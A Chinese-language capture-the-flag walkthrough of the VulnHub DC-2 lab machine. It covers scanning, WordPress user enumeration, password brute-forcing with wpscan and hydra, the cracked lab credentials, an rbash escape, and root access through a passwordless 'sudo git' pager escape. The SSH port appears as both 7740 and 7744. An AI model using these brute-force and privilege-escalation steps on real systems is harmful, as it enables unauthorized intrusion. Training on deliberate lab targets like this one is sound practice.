CTF-DC2靶机攻防

实验环境准备：

• kali：172.25.0.69
• DC-2: MAC地址：00:0C:29:FE:17:D2
  DC-2靶机下载地址：https://www.vulnhub.com/entry/dc-2,311/

0x01 主机发现

netdiscover -i eth0 -r 172.25.0.0/24 //存活主机探测
探测到DC-2靶机的IP地址为 172.25.0.64

image.png

0x02 端口扫描

nmap -A -p- 172.25.0.64 //全端口扫描
探测到80端口开启了HTTP服务，7740端口开启了ssh服务

image.png
浏览器访问web服务，发现无法访问，修改hosts文件如下
hosts文件路径

• windows：C:\Windows\System32\drivers\etc

• linux：/etc/hosts

  
  image.png
  

  成功访问web服务，发现该网站是使用wordpress cms构建。

  
  image.png

0x03 信息收集

使用wordpress专用扫描器wpscan进行网站扫描
wpscan --url [http://dc-2](http://dc-2) -e vp,u --plugins-detection mixed
枚举得到网站后台用户，并制作用户字典
-e 枚举 u用户名 --plugins-detection vp含有漏洞的插件 mixed 混合模式（主动加被动）

image.png
image.png
nikto -h http://dc-2 //网站敏感页面扫描
发现后台登录页面 http://dc-2/wp-login.php
image.png

0x04 密码爆破

cewl 爬行网站来制作一个密码字典
cewl dc-2 > pass.dic
用wpscan来进行表单密码爆破
wpscan --url http://dc-2 -U user.dic -P pass.dic
| Username: jerry, Password: adipiscing
| Username: tom, Password: parturient

image.png
使用jerry账号登录网站后台管理页面，发现flag1、flag2
image.png
image.png

使用hydra进行ssh爆破，爆破得到ssh账户tom密码为parturient
hydra ssh://dc-2 -L user.dic -P pass.dic -vV -s 7744 -t 50 -o hydra.ssh

image.png
ssh登录发现tom用户登录的shell为rbash（受限制的bash）
rbash绕过参考链接：https://www.freebuf.com/articles/system/188989.html
image.png
查看当前shell可执行的命令
image.png
添加环境变量来绕过bash限制
image.png
在tom用户家目录拿下flag3
image.png
su jerry命令切换到jerry用户，找到flag4
image.png
查看jerry可以以root用户的身份执行git命令并且不需要密码
image.png

0x05 提权

两种方法
1、sudo git help config
在末行命令模式输入  !/bin/bash 或 !'sh' 完成提权
2、sudo git -p help
      !/bin/bash

提权成功，拿到该靶机最高权限root

image.png

在root家目录拿下最后一个flag

image.png